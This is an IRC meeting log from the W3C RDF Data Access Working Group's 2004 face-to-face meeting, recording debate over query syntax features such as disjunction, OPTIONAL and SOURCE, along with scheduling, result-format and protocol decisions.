circular list using >> > - the two least significant bits of the pointers to tell what is >> > - the next pointer: 0 = jmp_next[0], 1 = jmp_next[1], 2 = >> > - jmp_first */ >> > - struct TranslationBlock *jmp_next[2]; >> > - struct TranslationBlock *jmp_first; >> > + /* Each TB has an assosiated circular list of TBs jumping to this one. >> > + * jmp_list_first points to the first TB jumping to this one. >> > + * jmp_list_next is used to point to the next TB in a list. >> > + * Since each TB can have two jumps, it can participate in two lists. >> > + * The two least significant bits of a pointer are used to choose >> > which >> > + * data field holds a pointer to the next TB: >> > + * 0 => jmp_list_next[0], 1 => jmp_list_next[1], 2 => jmp_list_first. >> > + * In other words, 0/1 tells which jump is used in the pointed TB, >> > + * and 2 means that this is a pointer back to the target TB of this >> > list. >> > + */ >> > + struct TranslationBlock *jmp_list_next[2]; >> > + struct TranslationBlock *jmp_list_first; > OK I found that tricky to follow. Where does the value of the pointer > come from that sets these bottom bits? The TB jumping to this TB sets it? Yeah, that's not easy to describe. Initially, we set: tb->jmp_list_first = tb | 2 That makes an empty list: jmp_list_first just points to the this TB and the low bits are 2. After that we can add a TB to the list in tb_add_jump(): tb->jmp_list_next[n] = tb_next->jmp_list_first; tb_next->jmp_list_first = tb | n; where 'tb' is going to jump to 'tb_next', 'n' (can be 0 or 1) is an index of jump target of 'tb'. (I simplified the code here) Any ideas how to make it more clear in the comment? Kind regards, Sergey
|
https://lists.gnu.org/archive/html/qemu-devel/2016-03/msg05833.html
|
CC-MAIN-2020-16
|
refinedweb
| 475
| 61.87
|
IRC log of dawg on 2004-09-17
Timestamps are in UTC.
08:51:01 [RRSAgent]
RRSAgent has joined #dawg
08:51:18 [kendallc]
i don't think so, re: news
08:51:23 [AndyS]
Map to optional : issue is that variables would get bound
08:52:52 [kendallc]
i'll point ericp to it when the disjunction discussion slows down
08:53:11 [AndyS]
Some cases (many?) can be done by value disjunction
08:54:04 [AndyS]
(example on screen)
08:54:46 [AndyS]
JF: Very difficult for implementations
08:54:54 [kendallc]
q?
08:54:59 [AndyS]
(scribe agreeds - needs data flow analysis of query - not syntax)
08:55:36 [rob]
trickier example would be get people who are either of type "doggowner" or own a pet whose type is a dog
08:55:41 [ericP]
q?
08:55:54 [AndyS]
ack, kendallc
08:55:55 [AlbertoR]
AlbertoR has joined #dawg
08:56:01 [DaveB]
let me paste the examples
08:56:08 [DaveB]
4. Want at least one of them with the constraint
08:56:08 [DaveB]
ASK
08:56:08 [DaveB]
OPTIONAL (?person rdf:type Engineer)
08:56:08 [DaveB]
OPTIONAL (?person rdf:type Manager)
08:56:09 [DaveB]
(?person ex:age ?age)
08:56:11 [DaveB]
WHERE
08:56:13 [rob]
kendall: how much of opt difficulty is just
08:56:13 [DaveB]
?age >20
08:56:15 [JanneS]
JanneS has joined #dawg
08:56:17 [AndyS]
Kendall: Hard to implement?
08:56:18 [DaveB]
=> YES
08:56:22 [DaveB]
and
08:56:23 [DaveB]
5. Re-expression of 4 using value disjunction
08:56:25 [DaveB]
ASK
08:56:27 [DaveB]
(?person ex:age ?age)
08:56:29 [DaveB]
(?person rdf:type ?type)
08:56:31 [DaveB]
WHERE
08:56:33 [DaveB]
(?type = Engineer OR ?type = Manager) AND
08:56:35 [DaveB]
?age > 20
08:56:39 [DaveB]
=>
08:56:41 [DaveB]
YES
08:57:32 [kendallc]
how much of the optimization worries are due to SteveH's sql-based implementation strategy. That is, I'm wondering how general they are.
08:57:34 [AndyS]
Steve: would simply expand all cases to one (large!) SQL query
08:57:45 [JFBaget]
JFBaget has joined #dawg
08:58:01 [DaveB]
steve worried about optimising
08:59:12 [rob]
eric: optimizations can hurt soundness and completeness\
08:59:22 [rob]
i.e. optimization can introduce bugs
08:59:23 [AndyS]
Jos: its a requirement (3.13)
08:59:37 [ericP]
ack Yoshio
08:59:37 [Zakim]
Yoshio, you wanted to ask what empty WHERE means
08:59:50 [kendallc]
zakim, q-
08:59:50 [Zakim]
I see no one on the speaker queue
08:59:50 [AndyS]
ack kendallc
08:59:51 [rob]
yoshio: what does empty where clause mean?
09:00:10 [AndyS]
DaveB: was a typo
09:00:19 [JFBaget]
zakim, q+
09:00:19 [Zakim]
I see JFBaget on the speaker queue
09:00:26 [rob]
yoshio: with optional at top and no other where terms..
09:00:29 [JosD]
q+ to point to requirement 3.13 RDF Graph Pattern MatchingDisjunction
09:01:22 [rob]
yoshio: select ?x where optional (?x, ?x ?x)
09:01:33 [rob]
anday: return one row one column
09:01:53 [rob]
andy: using construct instead of select in that query migght return an error
09:02:12 [ericP]
q?
09:02:15 [rob]
steve: with construct, if x isn't bound result is empty doc
09:02:35 [ericP]
ack JFBaget
09:03:05 [ericP]
q+ ericP
09:03:15 [rob]
jf: implementation will have two components graph matching and then constraints.
09:03:20 [ericP]
q-
09:03:38 [ericP]
q+ ericP to ask if optimization is a criteria for success
09:03:38 [rob]
jf: will bbe much more efficieent to be able to put disjunction in first step
09:03:51 [rob]
jf: we know algorithms tto do disjunction
09:04:07 [rob]
steve: y system doesn't separate those two steps as explicitly
09:04:37 [rob]
steve: simple constraints are used to prune graph matchin stage in my system
09:05:02 [ericP]
ack JosD
09:05:02 [Zakim]
JosD, you wanted to point to requirement 3.13 RDF Graph Pattern MatchingDisjunction
09:05:27 [rob]
(examples are being typed up ffor later review)
09:05:44 [rob]
jos: 3.13 requires disjunction
09:06:00 [rob]
steve: but optional might meet those needs
09:06:28 [rob]
3.13 was proposed and accepted during a face-to-face\
09:07:13 [rob]
steve: process error that it was accepted that way
09:07:15 [ericP]
q?
09:09:03 [rob]
eric: let's get example where optional isn't good enough
09:09:09 [rob]
andy: and let's post it to the email list
09:11:08 [rob]
action: rob to do stuff
09:11:21 [rob]
steve to own disjunction issue
09:11:29 [ericP]
ack ericP
09:11:29 [Zakim]
ericP, you wanted to ask if optimization is a criteria for success
09:12:22 [rob]
eric: how do we balance expressiveness with implementation and optimization ease
09:12:48 [rob]
kendall: it should be some kind of concern
09:13:02 [ericP]
q?
09:13:22 [kendallc]
if the optimization worries are generalizable, then yes, it's a real concern. but i don't know that and no one has claimed it.
09:13:41 [rob]
state of art is triple-based, not graph matchin based
09:14:59 [rob]
janne: in SQL, some queries just perfform poorly
09:15:09 [rob]
steve: in SQL you can tell which ones will perfform poorly
09:16:02 [rob]
straw poll: who wants to drop disjunction
09:16:11 [rob]
4 in favor (reluctat fifth
09:16:59 [rob]
three or four against
09:17:21 [DanC_lap]
DanC_lap has joined #dawg
09:17:40 [rob]
DanC has joined th meeting and is taking over as chair
09:19:01 [rob]
danc: let's update issues list at break
09:19:15 [rob]
danc: f2f meeting schedule
09:19:57 [rob]
danc: we ffinally know tech plenary date; let's meeet efore end of feb
09:20:13 [rob]
dan: booked to end of year
09:20:27 [rob]
steve: considered hosting ( inUK)
09:20:33 [ericP]
yoshio, should we drag everyone to japan?
09:20:39 [rob]
kendall: possibly in DC
09:20:47 [rob]
janne: finland, anyone?
09:20:47 [Yoshio]
in January?
09:21:25 [Yoshio]
If we plan to use Keio room, I think January is not a good month (entrance exam)
09:21:36 [ericP]
oo, good point
09:21:40 [rob]
It's everyody's favorite game, the Scheduling Game! Hooray!!!
09:25:41 [rob]
19-20 Jan looks liike a good tiime; kendall will consider DC
09:26:14 [rob]
action: kendall to consider DC
09:26:31 [rob]
action janne to consider hosting f2f\
09:26:39 [rob]
action: janne to considerhosting f2f
09:26:47 [rob]
action: steve to consider hosting f2f
09:27:02 [rob]
dan: moving on to telecon times
09:27:11 [rob]
dan: same time boston time?
09:27:17 [rob]
yoshio: NOOOOOOO!
09:27:49 [kendallc]
Janne: how about a meeting in Tampere? :>
09:27:54 [kendallc]
sounds insanely cool there
09:27:54 [rob]
(this is partly over daylight saings time change)
09:33:03 [JanneS]
Hmm, Tampere is 200kms (130miles) North from my home and office... could do, though, if you insist.
09:33:19 [kendallc]
:>
09:34:04 [rob]
danc: agreed to meet 1430 utc
09:34:30 [rob]
kendall: dan is being mean to people not here
09:34:54 [kendallc]
it's just a meaningless point to make, give yr input if yr not gonna be here. it wouldn't make a bit of difference to the decision.
09:34:57 [rob]
resolved to meet 1430 utc, no abstaintions no objections
09:35:22 [rob]
no meeting 21st
09:35:27 [rob]
next meetingg 28th
09:35:50 [rob]
scribe for 28th sept: janne
09:36:07 [rob]
f2f proposals expected before that meeting
09:37:04 [rob]
This concluded this exciting edition of the Scheule Game! thanks forplaying
09:37:10 [rob]
break
09:37:17 [rob]
scribe affter reak: ericp
09:58:24 [ericP]
[resume]
09:58:40 [ericP]
[BRQL grammar discussion]
09:59:16 [DaveB]
DARQ grammar discussion....
10:00:18 [ericP]
oh right, DARQ
10:01:57 [kendallc]
for example, the parents and instances of a class or the class tree.
10:03:53 [ericP]
Andy: issues around nesting...
10:04:29 [ericP]
... constraints can show up in lots of places
10:05:41 [ericP]
[Andy gives a tour of two syntax variants]
10:07:16 [ericP]
... are there other choices?
10:07:28 [ericP]
SteveH: not allow in-line constraints
10:07:28 [kendallc]
oops
10:10:05 [ericP]
example for Andy:
10:10:07 [ericP]
SELECT ?mbox ?name ?name2
10:10:07 [ericP]
FROM <file:D.n3>
10:10:07 [ericP]
WHERE
10:10:07 [ericP]
{ ?x foaf:mbox ?mbox .
10:10:09 [ericP]
?x foaf:number ?n . ?n < 30 .
10:10:12 [ericP]
OPTIONAL { ?x foaf:name ?name } .
10:10:14 [ericP]
OPTIONAL { ?x foaf:knows ?y . OPTIONAL { ?y foaf:name ?name2 } . }
10:10:17 [ericP]
}
10:12:19 [ericP]
SteveH asks for block-based OPTIONAL graphs
10:12:42 [ericP]
Andy: are you prepared to do data-flow analysis
10:12:51 [ericP]
SteveH: already do it for RDQL
10:14:53 [SteveH]
q+ to talk about trivalue logic
10:19:04 [ericP]
[DaveB proposes 4 syntax alternatives]
10:19:25 [ericP]
DaveB: let's stay close to RDQL 'cause people are using it now.
10:22:42 [ericP]
Andy: what RDQL query would *not* fit in [DaveB's forth proposal] ?
11:04:39 [ericP]
[break]
11:05:09 [ericP]
[Andy presents syn-prop.txt]
11:07:19 [ericP]
Andy asks about conjunctive constraints
11:07:40 [ericP]
SteveH has a prob with constraints applied to a block
11:09:29 [ericP]
... specifically, source applied to a multiple triples
11:10:04 [ericP]
prefix vs. using
11:10:24 [ericP]
Andy prefers prefix (before use) for single pass
11:10:36 [DaveB]
DaveB +1 to PREFISX
11:10:37 [ericP]
SteveH feels that it clutters the query.
11:10:49 [ericP]
eric{ +1 to PREFISX
11:12:17 [ericP]
SteveH withdraws objection to prefix
11:13:17 [ericP]
DanC: i'd like andyS to be less democratic
11:13:35 [ericP]
DaveB opposes nested optionals
11:13:49 [ericP]
... + SOURCE attached to triple
11:15:57 [ericP]
... can't see block boundries with the ANDs in the graph
11:17:01 [ericP]
EricP: what is your [DabveB
11:17:11 [ericP]
] objection to nested optionals
11:17:19 [ericP]
DaveB: doesn't seem required
11:17:29 [ericP]
Alberto: why not use quads
11:17:43 [ericP]
Andy: can make QL work but...
11:18:31 [ericP]
... What do you return when the triple comes from two models?
11:18:51 [ericP]
Alberto and SteveH return two solutions
11:23:23 [kendallc]
(s p o :prop value) -- colon doesn't work, but some other prefix might
11:23:33 [rob]
steve: use of 'as' as keyword
11:23:37 [kendallc]
(s p o prop=value) would, I guess
11:24:05 [rob]
andy: this sounds like starting over; making triples data objects in themodel
11:24:32 [rob]
dave: putting source riht next to the triple is the simplest solution
11:25:26 [rob]
staw poll: is it worth 'reinventing the universe' to come up with a robust way to handle 'source'?
11:25:41 [rob]
(consensus no, I think)
11:26:45 [rob]
andy: makes sense to be able to put 'and' blocks anywhere
11:28:12 [rob]
general agreement that ability to move any block anywhere in a where clause (becausee it's just a conjunction which is commutative)
11:28:17 [rob]
...is good
11:28:40 [rob]
dan: is source on just one triple good enough?
11:29:04 [rob]
steve: you can just tack the same thing onto multiple triples, and you can do the more general thing
11:29:50 [rob]
andy: weird that optionals are square brackets and eveything else is keywords
11:30:25 [rob]
kendall: consistency good
11:31:22 [rob]
andy: nested optionals can always be "distributed" out to top level\
11:31:44 [rob]
eric: anyone other than steve object to nested optionals?
11:31:55 [rob]
weakly object: jos dirk
11:32:07 [rob]
strongly for nested optionals andy
11:32:14 [rob]
weakly for: ericp, yoshio
11:33:08 [rob]
andy: wwith just an optional keyword, you make nested optionals impossible
11:33:36 [DanC_lap]
Steve: ah... "nested optionals in the future" is a convincing argument.
11:33:36 [kendallc]
rob, yr scribing makes me sound like Semantic Caveman... "consistency good; rob bad!" :>
11:35:12 [rob]
eric: any optional-supporters not content with planning for future nested optional syntax, but not including nested optionals as a feature?
11:36:02 [rob]
(nobody shouts too loudly)
11:37:02 [rob]
(expanding sample syntax to a query with multiple optional blocks)
11:37:35 [rob]
eric: how about using variables in different optional blocks?
11:37:46 [rob]
steve: the constraints are complex...
11:38:41 [rob]
ericp: let's let the editor put this example together and email it
11:39:15 [rob]
Rob expressed objection to this syntax
11:39:29 [rob]
6 in favor of this syntax
11:39:46 [rob]
two are ambivalent (orr abstainging or something)
11:40:24 [rob]
note that this is just a straw poll
11:40:32 [rob]
lunch time!
11:42:54 [rob]
rob: languages that explicitly declare variables make variables in otpionaltype bocks simpler, because scopin is straightforward
11:45:03 [DanC_lap]
break for lunch.
12:23:33 [shellac]
shellac has joined #dawg
12:35:08 [Zakim]
Zakim has left #dawg
12:40:33 [rob]
rob has joined #dawg
12:45:09 [DanC_lap]
starting to boot up after lunch...
12:45:22 [DanC_lap]
excused: JosD, JanneS
12:45:53 [AndyS]
AndyS has joined #dawg
12:46:27 [Yoshio]
Yoshio has joined #dawg
12:49:01 [kendallc]
12:49:03 [JanneS]
I'm excused.
13:04:19 [DaveB]
resuming
13:04:23 [DaveB]
publication schedule
13:04:44 [DaveB]
AndyS busy 20-24Sep
13:05:30 [DaveB]
avail 27Sep-1Oct
13:05:53 [DaveB]
DONM 28th Sep
13:06:41 [DaveB]
SteveH and DaveB offered reviews
13:06:47 [DaveB]
DanC will look for more later
13:07:16 [DaveB]
poss publication 35th Sept
13:07:18 [AlbertoR]
AlbertoR has joined #dawg
13:07:29 [DaveB]
also known as Oct5th
13:08:15 [DaveB]
DECISION to publish Oct5th based on reviews from 28thSep
13:08:29 [DanC_lap]
i.e. folks should expect a decision; we didn't just make one
13:09:22 [AndyS]
Editting finished by Oct 1
13:11:19 [DaveB]
discussion of the issues list
13:11:31 [DanC_lap]
ACTION DanC: talk with Kendall about issues list maintenance
13:12:14 [DaveB]
ACTION DanC: add a pointer to the issues list to the DAWG home page (if it isn't there)
13:12:34 [DaveB]
new name candidates
13:13:49 [DaveB]
added to the issues list item
13:14:02 [DaveB]
looking at
13:14:28 [DaveB]
protocol
13:17:29 [DanC_lap]
13:17:34 [DanC_lap]
"source of a triple" thread
13:18:14 [DaveB]
digression to xml format for results
13:20:16 [DaveB]
DaveB - xml result format, would take it and make skeletal doc, add schema
13:20:20 [DaveB]
maybe rename to match terms
13:20:26 [DaveB]
EricP - prefer tesrseer
13:20:28 [DaveB]
terser
13:20:53 [DaveB]
SteveH - like tr and td and th idea
13:20:59 [DaveB]
DaveB - will think about that
13:21:26 [DaveB]
maybe put in a namespace
13:21:49 [DaveB]
DanC - give it a or namespace else say why not
13:21:56 [DaveB]
Alberto - +datatype & lang
13:22:16 [DaveB]
EricP - argument for namespace - may want to later on add extra annotations such as proof. compositiblity
13:23:49 [DaveB]
flat
13:24:03 [DaveB]
DanC - protocol doc
13:24:17 [DaveB]
what would I put to say to a competent programmer to do this protocol
13:25:03 [DaveB]
DaveB - recipe style
13:25:35 [DaveB]
Kendall - joseki with some (not many) changes
13:25:35 [ericP]
<Result>
13:25:35 [ericP]
<tr><th>?name</th><th>?email</th></tr>
13:25:35 [ericP]
<tr><td xml:Bob</td><td resource="
mailto:bob@toy.example
"/></tr>
13:25:35 [ericP]
</Result>
13:25:49 [AndyS]
rdf:datatype=""
13:25:58 [DaveB]
Kendall - identifying server query points and models
13:26:54 [Yoshio]
re: tr, th approach Mmm, I don't like it. those tags doesn't bear the meanings
13:26:54 [ericP]
RDF Net API:
13:26:59 [DaveB]
and
13:27:45 [DaveB]
looking at QUERY: HTTP GET
13:28:07 [DaveB]
the URI without the ?query_string gets the model in a syntax [rdf/xml?]
13:28:21 [DaveB]
Kendall - confused about that; sending query to a graph, plus also haveing FROM in the QL
13:28:52 [DaveB]
SteveH - similar thing to this, no model stuff
13:29:15 [DaveB]
AndyS - FROM is really for the local case
13:29:45 [DaveB]
Algae has from
13:30:41 [DaveB]
EricP - annotaa does the getting the model when there is no Q like Joseki
13:30:49 [DaveB]
AndyS - you can say you don't support that
13:31:23 [DaveB]
ref to Atom Protocol work
13:31:31 [DaveB]
take some of the good points from there
13:31:51 [DaveB]
atompub ietf wg
13:32:03 [kendallc]
13:32:59 [DaveB]
DanC initution is that the no-querystring result should be documentation (html)
13:33:05 [DaveB]
maybe machiner eadbale
13:33:49 [DanC_lap]
no, not html.
13:33:55 [DanC_lap]
a service description.
13:34:28 [DanC_lap]
e.g. { <> a :Service; :expertIn :Biology, :Finance; :authoritativeOn :Kingdom, :Phylum, :stockPrice }.
13:34:45 [kendallc]
13:37:03 [kendallc]
13:37:58 [DaveB]
draft of autodiscovery for finding a feed from a w web page
13:38:21 [kendallc]
Atom API Quick Reference
13:38:22 [kendallc]
13:38:26 [kendallc]
that's pretty good, actually
13:39:23 [DaveB]
kendall was going to go write a protocool design doc
13:39:38 [DaveB]
DanC - what's new is services ...
13:39:55 [DaveB]
... marketplace here - can you convince these services to conform to this
13:40:48 [DaveB]
ACTION Kendall: write a protocol document draft
13:40:57 [ericP]
Annotea protocol -->
13:41:10 [AlbertoR]
+1 Kendall
13:41:23 [DaveB]
EricP - my code does this annotea protocol
13:41:35 [AlbertoR]
I can help to review the doc
13:41:52 [DaveB]
POST to make a doc, GET to get it (sic)
13:42:07 [DaveB]
query the service about a doc
13:42:47 [DaveB]
looking at
13:42:57 [DaveB]
but doesn't show the url encoding of the algae query
13:43:32 [DaveB]
DanC - not customised for info for us; re URLs
13:43:43 [DaveB]
EricP - issues brouguht up - querying a document or querying a service?
13:43:52 [DaveB]
... seems to be we are prefering querying a service
13:43:55 [DaveB]
... ISSUE
13:44:15 [DanC_lap]
NEW ISSUE: protocol URIs are for services or for document/graph/models?
13:45:01 [DaveB]
Kendall - starting from Joseki, first thing I want to address is the above issue
13:45:10 [DaveB]
... "What are you sending your query to?"
13:45:25 [TomAdams]
TomAdams has joined #dawg
13:46:06 [DaveB]
EricP - other issue ... if you are sending a query to the service not to the document....
13:47:19 [DaveB]
... REST FAQ
13:47:42 [DaveB]
... CGI url-encoded the params
13:49:13 [ericP]
GET /service?rq23=SELECT * FROM <../doc1> WHERE (?s ?p ?o)
13:49:41 [DanC_lap]
ACTION 7 = KendallC: draft a protocol document (est delivery in 1 month)
13:50:12 [DaveB]
discussion of FROM in the QL
13:50:23 [ericP]
GET /service?from=../doc1&rq23=SELECT * WHERE (?s ?p ?o)
13:51:28 [ericP]
GET /doc1&rq23=SELECT * WHERE (?s ?p ?o)
13:52:19 [DaveB]
comparing to GET index.tmpl?page=12345
13:53:21 [DaveB]
and URIs like /index.tmpl/12345
13:53:33 [DanC_lap]
(evolution of ?foo is not in URI-space, where as evolution of /doc1 and /service is)
13:54:18 [DaveB]
EricP - if we send a queyr to the document rather than service, we loose some of the document compositibility possibilities
13:54:39 [Yoshio]
+1
13:54:45 [DaveB]
however it's easy to see how to do this lke a ,rdf-query=.... suffix to a web page (W3C tech)
13:55:17 [DanC_lap]
ACTION ericp: follow up on " if we send a queyr to the document rather than service, we loose some of the document compositibility possibilities" in email
13:55:25 [DaveB]
querying an aggregation - give it a uri
13:55:54 [DaveB]
new item
13:55:59 [DaveB]
border of query language and protocol
13:56:24 [DanC_lap]
"source of a triple"
13:57:20 [DaveB]
DanC presents email above
13:57:21 [dirkx]
dirkx has joined #dawg
14:00:36 [danbri_dna]
danbri_dna has joined #dawg
14:01:02 [DaveB]
data + rdfs rules & applying the query
14:02:13 [DaveB]
let's not bind ?src to a.rdf, when it's not the graph you qyer
14:02:15 [DaveB]
query
14:02:47 [DaveB]
... the graph queried is triples in a.rdf + more triples made by inferencing
14:03:07 [DaveB]
AndyS - it's something else and important, so give it a different URI
14:03:23 [rob]
I think it's an extremely bad idea to standardize anything which is expected to read a language definition as input and also process that language...Goedel said a few things about the generality of this approach...
14:03:37 [DaveB]
SteveH - provenance issue also - was it said or implied
14:10:28 [DaveB]
point is, to keep a.rdf and it's rdfs closure distinct
14:11:33 [DaveB]
currently we have source that in FROM is the URI of documents
14:11:49 [DaveB]
but SOURCE that is the graph (?)
14:13:23 [DaveB]
ref to section 10
14:13:33 [Yoshio]
Hmm, as long as we don't have a name for a graph, what can we do?
14:13:43 [DaveB]
... to query pattern GP on G+mapping from URIs to graphs (or resources to grpah)
14:13:49 [DaveB]
[need to think more, DanC]
14:15:45 [ericP]
Yoshio, my guess is we can get away withont a name for the graph
14:15:57 [DaveB]
agenda review
14:16:43 [rob]
kendallc ok, this sucks, but it's at least different:
14:16:43 [rob]
kendallc It should be possible to query an RDF graph to find the parents,
14:16:43 [rob]
kendallc children, and instances of a class, as well as the types and
14:16:43 [rob]
kendallc properties of instances. Syntactic sugar for these kinds of query
14:17:15 [rob]
kendallc shall be considered to satisfy this objective.
14:17:57 [DaveB]
ground facts
14:18:35 [DaveB]
Kendall - kind of schema queries that rdf schema editor tools
14:18:39 [Yoshio]
query such things to a RDF graph? whta objective? (I lost the context)
14:18:47 [DaveB]
... like all the jena methods (above) for querying models [for schema info]
14:18:48 [DanC_lap]
q+
14:19:38 [DaveB]
EricP - might be a mechanism that looks like the extension mechanism for other features
14:19:43 [DaveB]
isGroundFactOf()
14:20:01 [DaveB]
AndyS - in Jena, two places comes up - in Ontology API
14:20:09 [DaveB]
where you are actually looking at the Ontology
14:20:17 [DaveB]
such as in an ontology editor
14:20:23 [TomAdams]
TomAdams has joined #dawg
14:20:26 [DaveB]
other place is in the rules engine
14:20:43 [DaveB]
when you want to write a rule that does direct subclass/not
14:20:53 [DaveB]
and does this via magic properties
14:20:55 [DaveB]
no reall other choice
14:21:01 [DaveB]
if you only have triples
14:21:06 [DaveB]
</AndyS>
14:21:17 [DaveB]
SteveH: could have a keyworrd GROUND
14:21:25 [DaveB]
AndyS or FROM on a triple
14:21:35 [DaveB]
like tucana does
14:22:37 [DaveB]
I see serql has {X} serql:directSubClassOf {Y}
14:22:40 [DaveB]
etc
14:24:00 [DanC_lap]
kc on 4.6
14:24:09 [kendallc]
SeRQL and RQL both have this kind of support
14:25:51 [DaveB]
go in as a use case?
14:26:23 [DaveB]
some people want that
14:28:33 [DaveB]
RobS could get the inferencer to add extra triples/properties to describe what is/isn't ground
14:31:19 [DanC_lap]
discussion of 4.6 shows support for the ontology editor use-case, but not much support for any paticular objective
14:32:40 [DanC_lap]
ACTION KendallC: provided updated UC&R as candidate for publication. [due in the next 2 to 3 weeks, in time to get the WG to decide on 5 Oct]
14:33:14 [DanC_lap]
DONE: ACTION Kendall: Pester Aditya about scheme/metascheme query support re: SWOOP
14:33:24 [AndyS]
14:34:16 [DanC_lap]
DONE: TomA: finding a use-case for distinguishing direct and indirect transitive predicates.
14:34:38 [TomAdams]
I've asked some of customers for input on this, no reply to date.
14:35:08 [TomAdams]
I wouldn't really call it a use case, just a statement of what we've implemented, and how it's exposed.
14:38:32 [AlbertoR]
14:38:40 [DanC_lap]
that's good enough for us, TomA
14:39:00 [DaveB]
from source mean different things?
14:39:35 [DaveB]
service, document, graph
14:39:47 [DaveB]
FROM is service|document but also graph?
14:39:55 [DaveB]
SOURCE deals with a graph?
14:40:45 [DaveB]
AndyS - FROM makes a graph from URIs given in the FROM
14:40:51 [DaveB]
whereas SOURCE refers to that graph
14:40:58 [DaveB]
Alberto - FROM is the graph
14:41:06 [DaveB]
... the protocol action
14:41:10 [DaveB]
... wherase SOURCE is about the graph
14:41:49 [DaveB]
... here some property dc:source could related a document and a graph
14:41:54 [DaveB]
... or dawg:source
14:41:58 [DaveB]
DanC - like log:semantics
14:42:42 [DaveB]
graphs seem to be in the data model
14:43:53 [DaveB]
request to write a query that uses FROM that cannot be done with SOURCE
14:44:18 [DaveB]
Alberto - virtual graphs such as in the foaf personal example from Alberto
14:45:09 [DanC_lap]
ACTION Alberto/Steve: edit the examples in
into test cases (either positive or negative tests)
14:45:34 [DaveB]
tests
14:46:16 [DanC_lap]
break for :15
15:25:04 [DaveB]
well, 15ish
15:26:25 [DanC_lap]
-- resume
15:26:38 [DaveB]
we're back
15:27:10 [DaveB]
4.2 & 4.5 pending
15:27:30 [DaveB]
Kendall - consolidate 4.2 & 4.5
15:27:55 [DaveB]
RobS - think we have accepted them as objectives
15:28:38 [kendallc]
andy thinks they are diff
15:29:50 [DaveB]
4.2 doesn't talk about the target of a query
15:29:57 [DaveB]
or querying
15:30:01 [Yoshio]
4.2== SOURCE, 4.5 == FROM?
15:30:09 [DaveB]
4.5 specifying more than one target, more about the input side of the query
15:30:26 [DaveB]
AndyS ... 4.2 allows you to get the information out
15:31:07 [DaveB]
Alberto see as FROM, where you get the data - merge
15:31:25 [DaveB]
... and 4.5 some way to connect to sources, but more about providing some constraints in how you merge them
15:31:34 [DaveB]
... 4.5 ismore general
15:33:29 [DaveB]
4.2 bigger graphs merge, from
15:33:41 [DaveB]
4.5 dealing with virtual graph exposing multiple sources
15:33:58 [DanC_lap]
(some comments about the shortness of the objectives, inter alia
)
15:35:28 [TomAdams]
TomAdams has joined #dawg
15:38:20 [DaveB]
suggestion torename 4.2 to "9 Querying the Origin of Statements" from rq23
15:39:28 [DanC_lap]
kc: ammendment: s/Origin/Source/
15:42:18 [DaveB]
rdf repositories - data from multiple sources
15:43:35 [DaveB]
proposal to swap 4.2/4.5 titles
15:43:45 [Yoshio]
Hmm, ambiguous
15:43:51 [DanC_lap]
PROPOSED: "4.2 Querying Multiple Sources ... which of the available rdf graphs ..."
15:44:20 [Yoshio]
Querying Multiple Sources could be read as "Quering to Multiple Soruces", no?
15:45:41 [DanC_lap]
PROPOSED: "4.2 Querying Multiple Sources ... which of the available rdf graphs ..." and "4.5 Querying the origin of triples ... can be used for data integration and aggregation ..."
15:46:41 [Yoshio]
Why do we need "Multiple" then?
15:46:48 [Yoshio]
in 4.2
15:47:00 [DanC_lap]
multiple as opposed to one
15:47:13 [Yoshio]
but what we get is one source
15:47:26 [ericP]
from multiple sources
15:47:33 [DanC_lap]
no, I read "which of the available rdf graphs" plural
15:47:34 [Yoshio]
(^_^;)
15:48:03 [Yoshio]
Hmm, English is difficult
15:49:32 [rob]
4.2 Querying Multiple Sources
15:49:33 [rob].
15:49:58 [rob]
4.5 Querying the origin of statements
15:49:59 [rob]
RDF can be used for data integration and aggregation. RDF repositories are built by merging RDF triples from several other RDF repositories or from non-RDF sources converted to RDF. Such an aggregations can be real or virtual.
15:49:59 [rob]
It must be possible for the query language and protocol to allow an RDF repository to expose the source from which a query server collected a triple or subgraph.
15:50:51 [DanC_lap]
-----------
15:52:06 [kendallc]
4.2 Querying Multiple Sources
15:52:06 [kendallc]
RDF can be used for data integration and aggregation. RDF repositories
15:52:06 [kendallc]
are built by merging RDF triples from several other RDF repositories
15:52:06 [kendallc]
or from non-RDF sources converted to RDF. Such an aggregations can be
15:52:06 [kendallc]
real or virtual.
15:52:09 [kendallc]
It must be possible for the query language and protocol to allow an
15:52:11 [kendallc]
RDF repository to expose the source from which a query server
15:52:14 [kendallc]
collected a triple or subgraph.
15:52:16 [kendallc]
4.5 Querying the Origins of Statements
15:52:19 [kendallc]
It should be possible for a query to specify which of the available
15:52:21 [kendallc]
RDF graphs it is to be executed against. If more than one RDF graph is
15:52:24 [kendallc]
specified, the result is as if the query had been executed against the
15:52:26 [kendallc]
merge of the specified RDF graphs. Some services may allow queries
15:52:29 [kendallc]
against only one graph; they are considered to trivially satisfy this
15:52:31 [kendallc]
objective.
15:52:34 [kendallc]
While a variety of use cases motivate this feature, one reason it
15:52:36 [kendallc]
isn't a requirement is that it's not clear whether it can be
15:52:39 [kendallc]
implemented in a generally scalable fashion.
15:52:43 [DanC_lap]
]]
15:54:30 [dirkx]
It should be possibe for a query to specify against which triples it must be excecuted based on the source of that triple as defined in 4.2
15:57:18 [dirkx]
4.2 Data Integration and Aggregation
15:57:19 [dirkx]
...
15:57:24 [dirkx]
4.2.1 - Querying mutliple soruces
15:57:25 [dirkx]
...
15:57:30 [dirkx]
4.2.2 Querying based on Source
15:57:31 [dirkx]
...
15:59:16 [kendallc]
4.2 RDF Aggregation and Querying the Origins of Statements
15:59:16 [kendallc]
RDF can be used for data integration and aggregation. RDF repositories
15:59:16 [kendallc]
are built by merging RDF triples from several other RDF repositories
15:59:16 [kendallc]
or from non-RDF sources converted to RDF. Such an aggregations can be
15:59:16 [kendallc]
real or virtual.
15:59:18 [kendallc]
It must be possible for the query language and protocol to allow an
15:59:21 [kendallc]
RDF repository to expose the source from which a query server
15:59:23 [kendallc]
collected a triple or subgraph. It must also be possible for a query
15:59:26 [kendallc]
to specify which of the available RDF graphs it is to be executed
15:59:28 [kendallc]
against. If more than one RDF graph is specified, the result is as if
15:59:31 [kendallc]
the query had been executed against the merge of the specified RDF
15:59:33 [kendallc]
graphs. Some services may allow queries against only one graph; they
15:59:36 [kendallc]
are considered to trivially satisfy this objective.
15:59:48 [DanC_lap]
]]
16:00:42 [dirkx]
4.2 data integration and aggregation
16:01:04 [dirkx]
4.2 data integration and aggregation
16:01:11 [dirkx]
4.2 data integration and aggregation
16:01:18 [dirkx]
RDF can be used for data integration and aggregation. RDF repositories
16:03:00 [ericP]
If more than one RDF graph is specified, the query is executed against the merge of the specified RDF graphs.
16:03:41 [ericP]
